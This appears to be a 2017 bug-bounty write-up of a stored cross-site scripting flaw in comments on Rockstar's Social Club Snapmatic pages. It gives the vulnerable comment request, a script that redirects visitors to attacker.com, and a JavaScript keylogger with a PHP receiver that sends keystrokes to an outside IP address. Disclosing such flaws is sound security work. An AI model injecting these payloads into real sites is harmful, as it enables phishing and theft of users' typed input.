Stored XSS on Rockstar Game

Arbaz Hussain
Jul 26, 2017 · 2 min read

Severity: High

Complexity : Easy

Weakness : Cross Site Scripting

Date : Nov 2016


  • Rockstar’s Current Game GTA V have a feature Snapmatic which is a app in game to take picture’s while playing and it get’s uploaded at socialclub.rockstargames.com

https://socialclub.rockstargames.com/games/gtav/pc/snapmatic

  • Other’s users of rockstar games have ability to view and comment on snapmatic picture’s .
  • Vulnerability was while commenting on snapmatic picture’s they were not filtering malicious tags / javascript .

POST /games/gtav/snapmatic/ajax/comment HTTP/1.1
Host: socialclub.rockstargames.com
Connection: close
Content-Length: 57
Accept: application/json, text/javascript, */*; q=0.01
RequestVerificationToken: REDACTEDTOKEN
Origin: https://socialclub.rockstargames.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/json
Referer: https://socialclub.rockstargames.com/games/gtav/snapmatic/mostrecent/photo/zVqgrrjUl0q8tRsmDvMi0w
Accept-Language: en-US,en;q=0.8
Cookie: csrf:token<REDACTED>
{"ugcId":"PICTUREID","comment":"PAYLOAD HERE"}

  • I Used the Basic payload to check the response & got script popup.

  • Worst Scenario is Script was directly getting executed in background when viewing images from https://socialclub.rockstargames.com/games/gtav/pc/snapmatic that might be because of rendering the first comment’s .
  • To Increase the impact i tried to find ways to make other user’s to comment payload on snapmatic images’s just like a WORM using ajax call’s but unfortunately they were using extra protection for csrf checking as you can see from above request.
  • As payload is getting render directly on main page /snapmatic
  • We can redirect all the user’s visiting /snapmatic to attacker choice url just like phishing .
<script>window.onload = window.location.href= ‘https://attacker.com';</script>

  • Or By adding a Keylogger :
  • Keylog.js
document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)
http.open("POST","http://52.61.158.123/keylog/keylog.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
  • Keylog.php
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store